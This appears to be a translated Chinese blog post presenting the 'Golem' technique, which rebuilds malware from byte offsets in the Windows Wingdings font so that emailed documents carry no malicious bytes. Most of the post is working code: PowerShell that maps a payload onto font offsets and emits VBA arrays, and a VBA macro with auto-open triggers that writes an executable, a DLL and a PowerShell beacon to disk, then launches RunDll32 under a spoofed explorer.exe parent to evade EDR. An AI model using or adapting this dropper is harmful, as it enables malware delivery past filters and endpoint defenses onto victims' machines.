Golem (魁儡)惡意軟體 --- 躲藏在Windows字型檔下的軟體
前言
有種依附在已安裝的合法二進位檔中(LoLBINs,Living-Off-the-Land Binaries),有點像是"搭便車"的方式,利用受害者電腦來執行惡意動作。不必躲在任何附加的檔案額外再去做轉換的動作,卻早已潛藏在受害者的電腦中。
雖然,在眾多攻擊案例裡,普遍遵循下列攻擊步驟(playskool高階步驟):
1. 傳送一個有效的夾帶檔案,包含:
l 需要被執行的惡意代碼
l 或者
l 若不需要惡意代碼,那麼就會在第三個步驟附帶下載惡意元件的代碼"
2. 誘使受害者執行附加檔
3. 該附加檔案將會:
l 在LoLBIN下執行惡意的元件
l 或者
l 下載LoLBIN並執行惡意的元件
目標
我想到一個可以遵循的標準:
1. 經過郵件過濾器、沙盒等等時不附帶任何惡意代碼(甚至惡意Byte機械代碼也不行,如下http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html)不下載惡意代碼
2. 執行惡意代碼
惡意軟體從受害者電腦自我產生新字型
首先我們需要找到每個Windows作業系統版本上相同的元件,我找了Holy Grail與這個:
我在Windows各個版本比對了文鼎的字型,確認相同無誤。
要實現我們的目標,字型似乎必須是普遍於所有Windows電腦之間。如何實現呢?步驟如下:
1. 從我們電腦裡的惡意軟體收集位元組
2. 將文鼎字型與其比對首個位元組碼
3. 當我在字型裏頭找到相同的位元組 我就將同樣位置記錄在文字檔裡
4. 重覆該程序直到我們找遍所有相符惡意軟體的位元組,同樣位置記錄到文字檔
5. 我們的有效載荷會涵蓋來自文鼎字型的每個位元組的位置
6. 在一個受害機器上,有效載荷會將文鼎字型中的Byte資料,建構成惡意元件
以Powershell的程式碼用來尋找字型中的byte資料:
$Font = "C:\Windows\Fonts\wingding.ttf"
$Malware = "C:\Users\Administrator\Pictures\2.PNG"
$fontArray = Get-Content $Font -Encoding Byte -ReadCount 0
$malwareArray = Get-Content $Malware -Encoding Byte -ReadCount 0
$offsetArray = @()
foreach ($byteInMalware in $malwareArray){
$index = 0
foreach ($byteInFont in $fontArray) {
if ($byteInMalware -eq $byteInFont) {
$offsetArray += $index
break
}
$index++
}
}
PowerShell代碼可以插入VBA巨集,該代碼會產生各位置的位元組去建構惡意元件。
$i=0
$payload = ""
$j=0
$u=1
$payDef = ""
foreach($offset in $offsetArray){
if($i -eq 30) {
$payload = $payload + ", " + $offset + " _`r`n"
$i=0
$j++
}
else {
if($i -eq 0) {
$payload = $payload + $offset
}
else {
$payload = $payload + ", " + $offset
}
}
if($j -eq 25) {
$payDef = $payDef + "`r`nFunction ccc$u()
tt$u = Array($payload)
ccc$u = tt$u
End Function"
$payload = ""
$u++
$j = 0
}
$i++
}
if($payload -ne ""){
$payDef = $payDef + "`r`nFunction ccc$u()
tt$u = Array($payload)
ccc$u = tt$u
End Function"
}
$payDef
結果如下:
該VBA代碼將會依序使用我們創建的陣列去產生惡意的元件,接著就會為了RunDll32.exe去選擇Explorer.exe作為子程序去混淆EDR程序;-)),然後就會在RunDll32.exe(.DLL從.ICO資源運行PowerShell指令碼)執行惡意元件。被注入記憶體的程序就能取代寫入文件到硬碟的作業。詳細操作留給讀者。
VBA代碼:
[...] --> you array of bytes containing the position of necessary bytes in the Windings font.
'example to join the bytes for the fist malicious component
t1 = cc1
t2 = cc2
t3 = cc3
t4 = cc4
t5 = cc5
t6 = cc6
t7 = cc7
t8 = cc8
t9 = cc9
t10 = cc10
t11 = cc11
t12 = cc12
t13 = cc13
t14 = cc14
t15 = cc15
t16 = cc16
t17 = cc17
t18 = cc18
ttt = Split(Join(t1, ",") & "," & Join(t2, ",") & "," & Join(t3, ",") & "," & Join(t4, ",") & "," & Join(t5, ",") & "," & Join(t6, ",") & "," & Join(t7, ",") & "," & Join(t8, ",") & "," & Join(t9, ",") _
& "," & Join(t10, ",") & "," & Join(t11, ",") & "," & Join(t12, ",") & "," & Join(t13, ",") & "," & Join(t14, ",") & "," & Join(t15, ",") & "," & Join(t16, ",") & "," & Join(t17, ",") & "," & Join(t18, ","), ",")
[...]
Dim nb As Integer
Dim nb2 As Integer
nb = UBound(ttt) - LBound(ttt) + 1 'ttt is a joined byte array
nb2 = UBound(tt) - LBound(tt) + 1
nb3 = UBound(ttttttt) - LBound(ttttttt) + 1
Dim intFileNumber As Integer
Dim i As Integer
Dim j As Integer
Dim lngFileSize As Long
Dim lngFileSize2 As Long
Dim strBuffer As String
Dim strBuffer2 As String
Dim lngCharNumber As Long
Dim lngCharNumber2 As Long
Dim strCharacter As String * 1
Dim strCharacter2 As String * 1
Dim strFileName As String
Dim strFileName2 As String
Dim offset() As Variant
strFileName = "C:\Windows\Fonts\wingding.ttf"
intFileNumber = FreeFile
Open strFileName For Binary Access Read Shared As #intFileNumber
lngFileSize = LOF(intFileNumber)
strBuffer = Space$(lngFileSize)
Get #intFileNumber, , strBuffer
Close #intFileNumber
Dim nFileNum As Long
Dim sFilename As String
Dim ind As Long
sFilename2 = "C:\Users\Public\Documents\changeMyParent.exe" ' crafted binary that will be use to select the parent of rundll32
sFilename = "C:\Users\Public\Documents\runPoshCode.dll" ' .DLL that will run powershell beacon from an image
sFilename3 = "C:\Users\Public\Documents\BEACON.ico" ' malicious powershell beacon registered in an .ICO
nFileNum = FreeFile
' a loop would be better ;-)
Open sFilename2 For Binary Lock Read Write As #nFileNum
For lngCharNumber = 0 To nb - 1
ind = lngCharNumber + 1
off = ttt(lngCharNumber)
strCharacter = Mid(strBuffer, off, 1)
Put #nFileNum, ind, strCharacter
Next lngCharNumber
Close #nFileNum
nFileNum = FreeFile
Open sFilename For Binary Lock Read Write As #nFileNum
For lngCharNumber = 0 To nb2 - 1
ind = lngCharNumber + 1
off = tt(lngCharNumber)
strCharacter = Mid(strBuffer, off, 1)
Put #nFileNum, ind, strCharacter
Next lngCharNumber
Close #nFileNum
nFileNum = FreeFile
Open sFilename3 For Binary Lock Read Write As #nFileNum
For lngCharNumber = 0 To nb3 - 1
ind = lngCharNumber + 1
off = ttttttt(lngCharNumber)
strCharacter = Mid(strBuffer, off, 1)
Put #nFileNum, ind, strCharacter
Next lngCharNumber
Close #nFileNum
rr
End Sub
Sub rr()
Dim xx As String
Dim oihfasf As Object, eopuf As Object, kdj As Object
Dim oDic As Object, a() As Variant
Dim pskaf As Integer
Set oDic = CreateObject("Scripting.Dictionary")
xx = "."
Set oihfasf = GetObject("winmgmts:\\" _
& xx & "\root\CIMV2")
Set eopuf = oihfasf.ExecQuery _
("Select Name, ProcessID FROM Win32_Process", , 48)
For Each kdj In eopuf
If (kdj.Properties_("Name").Value) = "explorer.exe" Then
pskaf = (kdj.Properties_("ProcessID").Value)
End If
Next
Dim t As Date
Dim cnt As Long
Dim arr(2) As Byte
Dim xl As String
xl = "C:\Users\Public\Documents\changeMyParent.exe ""C:\Windows\system32\RunDll32.exe C:\Users\Public\Documents\runPoshCode.dll,ComputeFmMediaType -f C:\Users\Public\Documents\BEACON.ico"" " & pskafxx = "."
Set ow = GetObject("winmgmts:\\" & xx & "\Root\cimv2")
Set os = ow.Get("Win32_ProcessStartup")
Set oc = os.SpawnInstance_
Set op = GetObject("winmgmts:\\" & xx & "\root\cimv2:Win32_Process")
op.Create xl, Null, oc, aslh
End Sub
Sub AutoOpen()
cc
End Sub
Sub Workbook_Open()
cc
End Sub
文章至此!
沒有留言:
張貼留言